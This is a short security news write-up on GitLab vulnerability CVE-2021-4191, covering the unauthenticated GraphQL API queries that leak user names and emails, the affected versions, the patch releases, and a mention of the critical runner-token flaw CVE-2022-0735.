Section 1.1: Details of the Vulnerability

The vulnerability, known as CVE-2021–4191, possesses a medium severity rating (CVSS score: 5.3) and affects all versions of both GitLab Community Edition and Enterprise Edition from version 13.0 onwards, as well as all versions starting from 14.4 but prior to 14.8. Jake Baines, a senior security researcher at Rapid7, discovered and reported this issue.

Updates to address this flaw were included in GitLab's critical security releases 14.8.2, 14.7.4, and 14.6.5, which were issued on February 25, 2022, following a responsible disclosure made on November 18, 2021.

Subsection 1.1.1: Exploitation Potential

Baines noted in a report, "The vulnerability stems from a lack of authentication checks during the execution of certain GitLab GraphQL API queries." This flaw permits an unauthorized remote attacker to obtain registered usernames, names, and email addresses linked to GitLab accounts.

If exploited, this information leak could enable malicious actors to compile lists of genuine usernames associated with a target, facilitating brute-force attacks like password guessing, password spraying, and credential stuffing.

"The data leak could also empower an attacker to create a new username wordlist based on GitLab installations—not just from gitlab.com, but also from the over 50,000 GitLab instances available online," Baines added.

Section 1.2: Additional Security Fixes

The recent update also addresses six other security vulnerabilities, including a critical flaw (CVE-2022–0735, CVSS score: 9.6) that permits unauthorized individuals to steal runner registration tokens necessary for authenticating and authorizing CI/CD tasks on GitLab.